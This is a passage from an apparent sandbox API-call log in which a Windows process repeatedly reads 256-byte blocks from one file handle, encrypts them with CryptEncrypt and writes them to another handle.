hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.515] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.515] GetLastError () returned 0x0 [0171.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.515] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.515] GetLastError () returned 0x0 [0171.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.515] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.515] GetLastError () returned 0x0 [0171.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.515] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.515] GetLastError () returned 0x0 [0171.515] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.515] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.516] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.516] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.516] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.516] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.517] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.517] GetLastError () returned 0x0 [0171.517] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.517] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.518] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.518] GetLastError () returned 0x0 [0171.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.518] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.518] GetLastError () returned 0x0 [0171.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.518] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.518] GetLastError () returned 0x0 [0171.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.518] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.518] GetLastError () returned 0x0 [0171.518] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.518] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.722] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.723] GetLastError () returned 0x0 [0171.723] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.723] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.723] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, 